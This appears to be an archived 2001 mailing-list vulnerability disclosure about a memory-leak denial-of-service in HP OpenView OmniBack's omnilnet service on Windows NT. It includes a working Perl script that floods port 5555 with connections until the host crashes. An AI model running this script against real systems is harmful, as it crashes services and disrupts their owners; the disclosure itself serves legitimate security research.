Hi, There seems to be a bug in HP Openview Omniback software. If a number of connections are established to port 5555 to an omniback system, the omnilnet process starts to consume more and more memory until the machine crashes. If the test is stopped, and the connections closed, Omniback does not free up the memory. I've tested this bug with Omniback vers 2.55, 3.0, and 3.10(newest), running on NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , and Winframe 1.8. All these systems seem to be vulnerable. Omniback on Solaris and on HPUX do not seem to have the problem. I've notified HP about the bug several weeks ago, and they have not yet released a patch. The following sample code will demonstrate the problem, but a better exploit could probably be written. Jon Hittner #!/usr/bin/perl # # Jon Hittner # Raise the memory size for omnilnet until Windows NT crashes # Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8 # Probably needs to be run several times to crash the system depending # on the amount of memory in the system. # This code was written to demo a problem, and I take no respoablity on how # it's used use strict; use Socket; my($y,$h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); print "TESTING: $h:$p\n"; for ($y=1 ; $y<2500000 ; $y++) { socket(S, AF_INET, SOCK_STREAM, $proto); connect(S,$addr) or next; select S; $| = 1; select STDOUT; send S,"OMNIBACK HAS SOME BIG ISSUES",0; } print "ATTACK COMPLETED!\n";
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:27 PDT